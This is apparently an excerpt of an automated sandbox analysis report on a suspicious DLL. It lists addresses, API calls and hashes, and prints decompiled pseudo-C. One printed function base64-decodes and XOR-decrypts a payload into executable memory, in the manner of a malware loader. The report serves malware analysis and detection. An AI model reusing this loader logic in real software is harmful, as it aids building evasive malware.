              0x6da85f3a
              0x6da85f3d
              0x6da85f40
              0x6da85f40
              0x00000000
              0x6da85f23
              0x6da85f23
              0x6da85f23
              0x6da85f26
              0x6da85f28
              0x6da85fe7
              0x6da85fe7
              0x00000000
              0x6da85f2e
              0x00000000
              0x6da85f2e
              0x6da85f28
              0x6da85f0a
              0x6da85f0a
              0x00000000
              0x6da85f0a
              0x6da85eda
              0x6da85eda
              0x6da85edc
              0x6da85edc
              0x6da85ee1
              0x6da85ee2
              0x6da85ee7
              0x6da85eea
              0x6da85eec
              0x6da85fec
              0x6da85fec
              0x6da85ff1
              0x6da85ff2
              0x6da85ff3
              0x6da85ff4
              0x6da85ff5
              0x6da85ff6
              0x6da85ff7
              0x6da85ff8
              0x6da85ff9
              0x6da85ffa
              0x6da85ffb
              0x6da85ffc
              0x6da85ffd
              0x6da85ffe
              0x6da85fff
              0x6da86000
              0x6da86001
              0x6da86003
              0x6da86006
              0x6da86009
              0x6da8600a
              0x6da8600c
              0x6da86011
              0x6da86014
              0x6da86015
              0x6da8601a
              0x6da8601d
              0x6da8601f
              0x6da86165
              0x00000000
              0x6da86025
              0x6da86025
              0x6da86028
              0x6da8602d
              0x6da86030
              0x6da86033
              0x6da86036
              0x6da86038
              0x6da8605f
              0x6da86061
              0x6da86063
              0x6da86065
              0x6da8606e
              0x6da86070
              0x6da86072
              0x6da86075
              0x6da86075
              0x6da86078
              0x6da8607e
              0x6da8608d
              0x6da8608f
              0x6da8609e
              0x6da8609e
              0x6da86091
              0x6da86092
              0x6da86097
              0x6da8609a
              0x6da8609a
              0x00000000
              0x6da86080
              0x6da86080
              0x6da86080
              0x6da86083
              0x6da86085
              0x6da8616a
              0x6da8616a
              0x00000000
              0x6da8608b
              0x00000000
              0x6da8608b
              0x6da86085
              0x6da86067
              0x6da86067
              0x00000000
              0x6da86067
              0x6da8603a
              0x6da8603a
              0x6da8603c
              0x6da8603c
              0x6da86041
              0x6da86042
              0x6da86047
              0x6da8604a
              0x6da8604c
              0x6da8616f
              0x6da8616f
              0x6da86174
              0x6da86175
              0x6da86176
              0x6da86177
              0x6da86178
              0x6da86179
              0x6da8617a
              0x6da8617b
              0x6da8617c
              0x6da8617d
              0x6da8617e
              0x6da8617f
              0x6da86180
              0x6da86183
              0x6da86186
              0x6da86187
              0x6da86189
              0x6da86190
              0x6da86191
              0x6da86194
              0x6da86199
              0x6da8619c
              0x6da8619d
              0x6da8619f
              0x6da862c9
              0x00000000
              0x6da861a5
              0x6da861a5
              0x6da861a8
              0x6da861ad
              0x6da861b0
              0x6da861b3
              0x6da861b6
              0x6da861b8
              0x6da861e2
              0x6da861e4
              0x6da861e6
              0x6da861e8
              0x6da861f1
              0x6da861f3
              0x6da861f5
              0x6da861f8
              0x6da861f8
              0x6da861fb
              0x6da86201
              0x6da86210
              0x6da86212
              0x6da86224
              0x6da86224
              0x6da86214
              0x6da86215
              0x6da8621a
              0x6da8621d
              0x6da86220
              0x6da86220
              0x00000000
              0x6da86203
              0x6da86203
              0x6da86203
              0x6da86206
              0x6da86208
              0x6da862ce
              0x6da862ce
              0x00000000
              0x6da8620e
              0x00000000
              0x6da8620e
              0x6da86208
              0x6da861ea
              0x6da861ea
              0x00000000
              0x6da861ea
              0x6da861ba
              0x6da861ba
              0x6da861bc
              0x6da861bc
              0x6da861c1
              0x6da861c2
              0x6da861c7
              0x6da861ca
              0x6da861cc
              0x6da862d3
              0x6da862d3
              0x6da862d8
              0x6da862d9
              0x6da862da
              0x6da862db
              0x6da862dc
              0x6da862dd
              0x6da862de
              0x6da862df
              0x6da862e0
              0x6da862e2
              0x6da862e4
              0x00000000
              0x6da862ea
              0x6da862ec
              0x6da861d2
              0x6da861d2
              0x6da861d5
              0x6da861d8
              0x6da861db
              0x6da86226
              0x6da86229
              0x6da86236
              0x6da86239
              0x6da8623e
              0x6da86241
              0x6da86245
              0x6da86248
              0x6da86249
              0x6da862a0
              0x6da862a1
              0x6da862a2
              0x6da862ae
              0x6da862b9
              0x6da862be
              0x6da862c6
              0x6da8624b
              0x6da8624b
              0x6da8624d
              0x6da8624e
              0x6da8624f
              0x6da8625d
              0x6da8626b
              0x6da8626c
              0x6da8626f
              0x6da86275
              0x6da86289
              0x6da86289
              0x6da8628b
              0x6da86293
              0x6da8629d
              0x6da86277
              0x6da86277
              0x6da8627a
              0x6da8627f
              0x6da86282
              0x6da86285
              0x00000000
              0x6da86287
              0x6da86287
              0x00000000
              0x6da86287
              0x6da86285
              0x6da86275
              0x6da86249
              0x6da861cc
              0x6da861b8
              0x6da86052
              0x6da86052
              0x6da86055
              0x6da86058
              0x6da860a0
              0x6da860a6
              0x6da860b0
              0x6da860b6
              0x6da860b9
              0x6da860bf
              0x6da860c4
              0x6da860c7
              0x6da860cb
              0x6da860ce
              0x6da860cf
              0x6da86131
              0x6da86132
              0x6da86133
              0x6da8613f
              0x6da8614a
              0x6da86150
              0x6da86158
              0x6da86162
              0x6da860d1
              0x6da860d1
              0x6da860d3
              0x6da860d4
              0x6da860d5
              0x6da860e3
              0x6da860f4
              0x6da860fc
              0x6da860ff
              0x6da86100
              0x6da86106
              0x6da8611a
              0x6da8611a
              0x6da8611c
              0x6da86124
              0x6da8612e
              0x6da86108
              0x6da86108
              0x6da8610b
              0x6da8610e
              0x6da86110
              0x6da86113
              0x6da86116
              0x00000000
              0x6da86118
              0x6da86118
              0x00000000
              0x6da86118
              0x6da86116
              0x6da86106
              0x6da860cf
              0x6da8604c
              0x6da86038
              0x6da85ef2
              0x6da85ef2
              0x6da85ef5
              0x6da85ef8
              0x6da85efb
              0x6da85f46
              0x6da85f49
              0x6da85f4f
              0x6da85f52
              0x6da85f57
              0x6da85f5a
              0x6da85f5e
              0x6da85f61
              0x6da85f62
              0x6da85fb9
              0x6da85fba
              0x6da85fbb
              0x6da85fc7
              0x6da85fd2
              0x6da85fd7
              0x6da85fdf
              0x6da85f64
              0x6da85f64
              0x6da85f66
              0x6da85f67
              0x6da85f68
              0x6da85f76
              0x6da85f7e
              0x6da85f84
              0x6da85f85
              0x6da85f88
              0x6da85f8e
              0x6da85fa2
              0x6da85fa2
              0x6da85fa4
              0x6da85fac
              0x6da85fb6
              0x6da85f90
              0x6da85f90
              0x6da85f93
              0x6da85f96
              0x6da85f98
              0x6da85f9b
              0x6da85f9e
              0x00000000
              0x6da85fa0
              0x6da85fa0
              0x00000000
              0x6da85fa0
              0x6da85f9e
              0x6da85f8e
              0x6da85f62
              0x6da85eec
              0x6da85ed8
              0x6da85e50
              0x6da85e50
              0x6da85e53
              0x6da85e57
              0x6da85e5b
              0x6da85e67
              0x6da85e6a
              0x00000000
              0x6da85e6a
              0x6da85e38
              0x6da85e38
              0x00000000
              0x6da85e38
              0x6da85e2a
              0x6da85e2d
              0x00000000
              0x6da85e2d
              0x6da85e28
              0x6da85e1e
              0x6da85e14
              0x6da85d34
              0x6da85d39
              0x6da85d41
              0x6da85d4b
              0x6da85d51
              0x6da85d56
              0x6da85d5a
              0x6da85d5e
              0x6da85d6a
              0x6da85d6d
              0x00000000
              0x6da85d6d
              0x6da85cbe
              0x6da85cbe
              0x00000000
              0x6da85cbe
              0x6da85cb0
              0x6da85cb3
              0x00000000
              0x6da85cb3
              0x6da85cae
              0x6da85c83
              0x6da85c83
              0x6da85c86
              0x6da85c93
              0x6da85c9d
              0x6da85c9d
              0x6da85c81

              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA85C23
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA85C43
              • std::_Lockit::~_Lockit.LIBCPMT ref: 6DA85C63
              • std::_Lockit::~_Lockit.LIBCPMT ref: 6DA85C86
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA85CF1
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DA85D39
              • std::_Facet_Register.LIBCPMT ref: 6DA85D5E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_$Lockit::~_$Facet_Locinfo::_Locinfo_ctorRegister
              • String ID: bad locale name
              • API String ID: 1197013505-1405518554
              • Opcode ID: b425e46fa188b9f1fa15b2e1b18f0459bf986a69f6181527e3ac4d04fb08e7b1
              • Instruction ID: 0a09d4d44301b6a7734d5f62fd2412c6530b18a0cecd6c55e2d771adc36eee1c
              • Opcode Fuzzy Hash: b425e46fa188b9f1fa15b2e1b18f0459bf986a69f6181527e3ac4d04fb08e7b1
              • Instruction Fuzzy Hash: 7441B0B590C2449FCB11CFA8DA84BAEBBB4FF45714F19805DDC49AB342DB30A985CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA891AF Relevance: 12.2, APIs: 8, Instructions: 175COMMON
              Download Yara Rule
              APIs
              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 6DA891F8
              • __alloca_probe_16.LIBCMT ref: 6DA89224
              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 6DA89263
              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DA89280
              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 6DA892BF
              • __alloca_probe_16.LIBCMT ref: 6DA892DC
              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DA8931E
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6DA89341
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ByteCharMultiStringWide$__alloca_probe_16
              • String ID:
              • API String ID: 2040435927-0
              • Opcode ID: 57a911794fc0f8ffcb1106b0d183901654578ef6bcf9d983d65d9be1fa886461
              • Instruction ID: 4c204d8688979188a206cc6f70db2bb06dfa5c700b935b47343f3ec823e313b9
              • Opcode Fuzzy Hash: 57a911794fc0f8ffcb1106b0d183901654578ef6bcf9d983d65d9be1fa886461
              • Instruction Fuzzy Hash: 1451F272508216AFEF108FA0CE44FAF7BB9EF49740F194528FD2496191EB78D880CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA81B10 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 257memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 79%
              			E6DA81B10() {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				void* _v16;
				intOrPtr _v24;
				intOrPtr _v29;
				unsigned int _v30;
				signed char _v32;
				signed char _v33;
				signed int _v38;
				signed int _v39;
				signed int _v40;
				signed int _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				signed int* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _v76;
				void* _v92;
				char _v100;
				char _v164;
				void* __ebx;
				void* __edi;
				char _t99;
				intOrPtr _t100;
				intOrPtr _t103;
				signed char _t107;
				signed char _t108;
				void* _t116;
				void* _t119;
				intOrPtr _t131;
				intOrPtr _t136;
				void* _t146;
				signed int* _t151;
				void* _t153;
				signed char _t157;
				void* _t159;
				void* _t174;
				signed int _t176;
				void* _t181;
				intOrPtr _t200;
				unsigned char _t206;
				void* _t208;
				void* _t210;
				void* _t212;
				signed int _t213;
				void* _t216;
				void* _t218;
				intOrPtr* _t219;
				signed int _t220;
				void* _t222;
				intOrPtr _t225;
				void* _t229;
				intOrPtr _t232;
				void* _t233;

				_t159 = _t229;
				_t232 = (_t229 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t159 + 4));
				_t225 = _t232;
				_push(0xffffffff);
				_push(E6DAA2345);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t232;
				_push(_t159);
				_t233 = _t232 - 0x88;
				asm("movups xmm0, [0x6daaf258]");
				_t99 =  *0x6daaf298; // 0x0
				asm("movups [ebp-0x98], xmm0");
				asm("movups xmm0, [0x6daaf268]");
				_v100 = _t99;
				_t100 =  *0x6dad4884; // 0x20e6c
				asm("movups [ebp-0x88], xmm0");
				asm("movups xmm0, [0x6daaf278]");
				asm("movups [ebp-0x78], xmm0");
				asm("movups xmm0, [0x6daaf288]");
				asm("movups [ebp-0x68], xmm0");
				_t195 = VirtualAlloc(0, _t100 + _t100, 0x3000, 0x40);
				_t210 = 0;
				_t103 =  *0x6dad4884; // 0x20e6c
				_t216 = 0;
				_v64 = _t195;
				_v44 = 0;
				if(_t103 == 0) {
					L27:
					 *0x6dad4884 = _t210;
					 *[fs:0x0] = _v24;
					return _v64;
				} else {
					_t6 = _t195 + 2; // 0x2
					_t164 = _t6;
					_v60 = _t6;
					while(1) {
						_v68 = _t103 - 1;
						_t107 =  *( *(_t159 + 8));
						_v33 = _t107;
						if(_t107 == 0x3d) {
							break;
						}
						_t119 = E6DA8DB50(_t159, _t164, _t195, _t107 & 0x000000ff);
						_t233 = _t233 + 4;
						if(_t119 != 0) {
							L6:
							_v56 = 0;
							_v52 = 0;
							_v48 = 0;
							_v16 = 0;
							_push(0xd);
							_v92 = 0;
							_v76 = 0;
							_v72 = 0xf;
							_v92 = 0;
							E6DA81770( &_v92, "dfxsgdfhdgfjh");
							_v16 = 1;
							_t174 =  &_v56;
							E6DA82160(_t159, _t174, _t210, 0,  &_v92);
							_v16 = 0;
							_t200 = _v72;
							if(_t200 < 0x10) {
								L10:
								_t210 = _v56;
								_t195 = _v52;
								_push(_t174);
								E6DA82340(_t210, _v52, _t210);
								_t176 =  *(_t159 + 8);
								_t233 = _t233 + 4;
								_v52 = _t210;
								_t164 = _t176 + 1;
								 *((char*)(_t225 + _t216 - 0x14)) =  *_t176;
								_t216 = _t216 + 1;
								 *(_t159 + 8) = _t164;
								if(_t216 == 4) {
									_t222 = 0;
									do {
										_t146 = E6DA8A950( &_v164,  *((char*)(_t225 + _t222 - 0x14)));
										_t233 = _t233 + 8;
										 *((char*)(_t225 + _t222 - 0x14)) = _t146 -  &_v164;
										_t222 = _t222 + 1;
									} while (_t222 < 4);
									_t206 = _v30;
									_v44 = _v44 + 3;
									_t195 = (_t206 << 6) + _v29;
									_t164 = (_t206 >> 0x00000002 & 0x0000000f) + (_v32 << 4);
									_t151 = _v60;
									_v40 = _t164;
									_v39 = _t164;
									_v38 = _t195;
									 *(_t151 - 2) = _t164;
									 *(_t151 - 1) = _t164;
									 *_t151 = _t195;
									_v60 =  &(_t151[0]);
									_t216 = 0;
								}
								_v16 = 0xffffffff;
								if(_t210 == 0) {
									L18:
									_t103 = _v68;
									if(_t103 != 0) {
										continue;
									} else {
										break;
									}
								} else {
									_push(_t164);
									E6DA82340(_t210, _t210, _t210);
									_t233 = _t233 + 4;
									_t195 = 0x2aaaaaab * (_v48 - _t210) >> 0x20 >> 2;
									_t131 = _t210;
									_t164 = (0x2aaaaaab * (_v48 - _t210) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _t210) >> 0x20 >> 2) + ((0x2aaaaaab * (_v48 - _t210) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _t210) >> 0x20 >> 2)) * 2 << 3;
									if(_t164 < 0x1000) {
										L17:
										_push(_t164);
										E6DA893C9(_t210);
										_t233 = _t233 + 8;
										_v56 = 0;
										_v52 = 0;
										_v48 = 0;
										goto L18;
									} else {
										_t210 =  *((intOrPtr*)(_t210 - 4));
										_t164 = _t164 + 0x23;
										if(_t131 - _t210 + 0xfffffffc > 0x1f) {
											goto L28;
										} else {
											goto L17;
										}
									}
								}
							} else {
								_t174 = _v92;
								_t208 = _t200 + 1;
								_t153 = _t174;
								if(_t208 < 0x1000) {
									L9:
									_push(_t208);
									E6DA893C9(_t174);
									_t233 = _t233 + 8;
									goto L10;
								} else {
									_t164 =  *(_t174 - 4);
									_t195 = _t208 + 0x23;
									if(_t153 -  *(_t174 - 4) + 0xfffffffc > 0x1f) {
										L28:
										E6DA8DACF(_t159, _t164, _t195);
										asm("int3");
										asm("int3");
										_push(_t225);
										_push(_t216);
										_t219 = _v164;
										_push(_t210);
										_t181 = _t219 + 1;
										do {
											_t136 =  *_t219;
											_t219 = _t219 + 1;
										} while (_t136 != 0);
										_t213 = 0;
										_t220 = _t219 - _t181;
										if(_v4 > 0) {
											_push(_t159);
											do {
												if(_t213 == (0x10624dd3 * _t213 >> 0x20 >> 6) * 0x3e8) {
													Sleep(2);
												}
												asm("cdq");
												 *(_t213 + 0x6dab3a18) =  *(_t213 + 0x6dab3a18) ^  *(_t213 % _t220 + _v0);
												_t213 = _t213 + 1;
											} while (_t213 < _v4);
										}
										return 0x6dab3a18;
									} else {
										goto L9;
									}
								}
							}
						} else {
							_t157 = _v33;
							if(_t157 == 0x2b || _t157 == 0x2f) {
								goto L6;
							} else {
								DebugBreak();
								break;
							}
						}
						goto L38;
					}
					if(_t216 == 0) {
						_t210 = _v44;
					} else {
						_t212 = 0;
						if(_t216 > 0) {
							do {
								_t116 = E6DA8A950( &_v164,  *((char*)(_t225 + _t212 - 0x14)));
								_t233 = _t233 + 8;
								 *((char*)(_t225 + _t212 - 0x14)) = _t116 -  &_v164;
								_t212 = _t212 + 1;
							} while (_t212 < _t216);
						}
						_t108 = _v32;
						_t218 = _t216 - 1;
						_t210 = _v44;
						_v40 = (_t108 >> 0x00000004 & 0x00000003) + (_t108 << 2);
						_v39 = (_v30 >> 0x00000002 & 0x0000000f) + (_t108 << 4);
						if(_t218 > 0) {
							E6DA8AB10(_v64 + _t210,  &_v40, _t218);
							_t210 = _t210 + _t218;
						}
					}
					goto L27;
				}
				L38:
			}





























































              0x6da81b11
              0x6da81b19
              0x6da81b20
              0x6da81b24
              0x6da81b26
              0x6da81b28
              0x6da81b33
              0x6da81b34
              0x6da81b3b
              0x6da81b3c
              0x6da81b42
              0x6da81b49
              0x6da81b4f
              0x6da81b57
              0x6da81b5e
              0x6da81b61
              0x6da81b66
              0x6da81b6f
              0x6da81b7d
              0x6da81b82
              0x6da81b8b
              0x6da81b95
              0x6da81b97
              0x6da81b99
              0x6da81b9e
              0x6da81ba0
              0x6da81ba3
              0x6da81ba8
              0x6da81e1b
              0x6da81e21
              0x6da81e28
              0x6da81e36
              0x6da81bae
              0x6da81bae
              0x6da81bae
              0x6da81bb1
              0x6da81bb4
              0x6da81bb5
              0x6da81bbb
              0x6da81bbd
              0x6da81bc2
              0x00000000
              0x00000000
              0x6da81bcc
              0x6da81bd1
              0x6da81bd6
              0x6da81be7
              0x6da81be7
              0x6da81bee
              0x6da81bf5
              0x6da81bfc
              0x6da81c06
              0x6da81c08
              0x6da81c14
              0x6da81c1b
              0x6da81c22
              0x6da81c26
              0x6da81c2e
              0x6da81c35
              0x6da81c38
              0x6da81c3d
              0x6da81c41
              0x6da81c47
              0x6da81c75
              0x6da81c75
              0x6da81c78
              0x6da81c7b
              0x6da81c7e
              0x6da81c83
              0x6da81c86
              0x6da81c89
              0x6da81c8e
              0x6da81c8f
              0x6da81c93
              0x6da81c94
              0x6da81c9a
              0x6da81c9c
              0x6da81ca0
              0x6da81cad
              0x6da81cb8
              0x6da81cbd
              0x6da81cc1
              0x6da81cc2
              0x6da81ccc
              0x6da81cd1
              0x6da81cf0
              0x6da81cf3
              0x6da81cf5
              0x6da81cf8
              0x6da81cfb
              0x6da81cfe
              0x6da81d01
              0x6da81d04
              0x6da81d07
              0x6da81d0c
              0x6da81d0f
              0x6da81d0f
              0x6da81d11
              0x6da81d1a
              0x6da81d82
              0x6da81d82
              0x6da81d87
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da81d1c
              0x6da81d1c
              0x6da81d21
              0x6da81d30
              0x6da81d35
              0x6da81d42
              0x6da81d44
              0x6da81d4d
              0x6da81d63
              0x6da81d63
              0x6da81d65
              0x6da81d6a
              0x6da81d6d
              0x6da81d74
              0x6da81d7b
              0x00000000
              0x6da81d4f
              0x6da81d4f
              0x6da81d52
              0x6da81d5d
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da81d5d
              0x6da81d4d
              0x6da81c49
              0x6da81c49
              0x6da81c4c
              0x6da81c4d
              0x6da81c55
              0x6da81c6b
              0x6da81c6b
              0x6da81c6d
              0x6da81c72
              0x00000000
              0x6da81c57
              0x6da81c57
              0x6da81c5a
              0x6da81c65
              0x6da81e39
              0x6da81e39
              0x6da81e3e
              0x6da81e3f
              0x6da81e40
              0x6da81e43
              0x6da81e44
              0x6da81e47
              0x6da81e48
              0x6da81e50
              0x6da81e50
              0x6da81e52
              0x6da81e53
              0x6da81e57
              0x6da81e59
              0x6da81e5e
              0x6da81e60
              0x6da81e67
              0x6da81e7b
              0x6da81e7f
              0x6da81e7f
              0x6da81e86
              0x6da81e8c
              0x6da81e92
              0x6da81e93
              0x6da81e98
              0x6da81ea1
              0x00000000
              0x00000000
              0x00000000
              0x6da81c65
              0x6da81c55
              0x6da81bd8
              0x6da81bd8
              0x6da81bdd
              0x00000000
              0x6da81e0d
              0x6da81e0d
              0x00000000
              0x6da81e0d
              0x6da81bdd
              0x00000000
              0x6da81bd6
              0x6da81d8f
              0x6da81e18
              0x6da81d95
              0x6da81d95
              0x6da81d99
              0x6da81da0
              0x6da81dad
              0x6da81db8
              0x6da81dbd
              0x6da81dc1
              0x6da81dc2
              0x6da81da0
              0x6da81dc6
              0x6da81dc9
              0x6da81dca
              0x6da81dec
              0x6da81def
              0x6da81df4
              0x6da81e01
              0x6da81e09
              0x6da81e09
              0x6da81df4
              0x00000000
              0x6da81d8f
              0x00000000

              APIs
              • VirtualAlloc.KERNEL32(00000000,00020E6C,00003000,00000040,00000000), ref: 6DA81B8F
              • ___from_strstr_to_strchr.LIBCMT ref: 6DA81CAD
              • ___from_strstr_to_strchr.LIBCMT ref: 6DA81DAD
              • DebugBreak.KERNEL32 ref: 6DA81E0D
              Strings
              • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 6DA81B42
              • dfxsgdfhdgfjh, xrefs: 6DA81C0F
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ___from_strstr_to_strchr$AllocBreakDebugVirtual
              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$dfxsgdfhdgfjh
              • API String ID: 948567615-1324637814
              • Opcode ID: 85b44af411087bf5daa2d2c4e2f7d210ced8035e0b8107566c978d954f312e84
              • Instruction ID: 327c84dccb64e9ed4e0d982ace9540ff128371d8e263acee27fbc1542068738a
              • Opcode Fuzzy Hash: 85b44af411087bf5daa2d2c4e2f7d210ced8035e0b8107566c978d954f312e84
              • Instruction Fuzzy Hash: A7A14B72D0C2488BDB05CFA8C9907FEBBB4AF5A304F194258DD5467383D7745589CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA96512 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 100%
              			E6DA96512(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x6dad5a60 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x6daa7930 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x6dad5a60 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x6dad5a60 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E6DA92838(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E6DA92838(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}












              0x6da9651b
              0x6da965b0
              0x6da96523
              0x6da96525
              0x6da9652f
              0x6da96534
              0x6da96541
              0x6da96556
              0x6da9655a
              0x6da965c0
              0x6da965c5
              0x6da965cc
              0x6da965d0
              0x6da965d3
              0x6da965d3
              0x6da965d9
              0x6da965d9
              0x6da965bb
              0x6da965bf
              0x6da965bf
              0x6da9655c
              0x6da96565
              0x6da9659e
              0x6da965ab
              0x6da965ad
              0x6da965ad
              0x00000000
              0x6da965ad
              0x6da9656f
              0x6da96574
              0x6da96579
              0x00000000
              0x00000000
              0x6da96583
              0x6da96588
              0x6da9658d
              0x00000000
              0x00000000
              0x6da96592
              0x6da96598
              0x6da9659c
              0x00000000
              0x00000000
              0x00000000
              0x6da9659c
              0x6da96539
              0x00000000
              0x00000000
              0x00000000
              0x6da9653f
              0x6da965b9
              0x00000000

              APIs
              • FreeLibrary.KERNEL32(00000000,?,6DA9661F,6DA824BD,?,?,00000000,?,?,6DA967EC,00000021,FlsSetValue,6DAA7F50,6DAA7F58,?), ref: 6DA965D3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-$ext-ms-
              • API String ID: 3664257935-537541572
              • Opcode ID: e761a4706c07cb0e9c012162dadb34cc00d3cfd4ec605bdac0352c3cd927baec
              • Instruction ID: 2146d1dec2a62f2198034fb9e7a42417b303566242833e41a36f254e7a7811e0
              • Opcode Fuzzy Hash: e761a4706c07cb0e9c012162dadb34cc00d3cfd4ec605bdac0352c3cd927baec
              • Instruction Fuzzy Hash: E1210875A2C726ABCB119A24CC44B6A37F9EF47370F1D4210E919AB384DB70EA81C6D0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA85D90 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
              Download Yara Rule
              C-Code - Quality: 50%
